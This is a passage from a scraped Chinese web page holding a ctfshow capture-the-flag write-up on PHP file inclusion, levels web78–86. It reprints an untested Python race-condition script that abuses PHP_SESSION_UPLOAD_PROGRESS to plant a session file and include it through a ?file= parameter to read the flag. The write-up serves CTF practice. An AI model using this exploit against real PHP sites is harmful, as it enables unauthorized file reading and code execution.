ctfshow |
您所在的位置:网站首页 › 科学发展观逐渐形成 › ctfshow |
文件包含
web78-79
大佬脚本(可以一把梭到web86,没有测试过只是帖一下不知道好用不好用): import io import sys import requests import threading sessid = 'Qftm' def POST(session): while True: f = io.BytesIO(b'a' * 1024 * 50) session.post( 'http://250307c3-cf87-4811-987f-20189fa2442c.chall.ctf.show/', data={"PHP_SESSION_UPLOAD_PROGRESS":""}, files={"file":('q.txt', f)}, cookies={'PHPSESSID':sessid} ) def READ(session): while True: response = session.get(f'http://250307c3-cf87-4811-987f-20189fa2442c.chall.ctf.show/?file=/tmp/sess_{sessid}') if 'flag' not in response.text: print('[+++]retry') else: print(response.text) sys.exit(0) with requests.session() as session: t1 = threading.Thread(target=POST, args=(session, )) t1.daemon = True t1.start() READ(session)依然得到fl0g.php 然后同样利用条件竞争来读取即可线程20左右很快就读取到了 web84看了一下剩下一直到web86的Hint,发现一摸一样所以就只帖一下源码,不打算重复操作了其实既然明白了session.upload_process对文件上传的处理过程,这种题目就已经没有了多大意义了 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |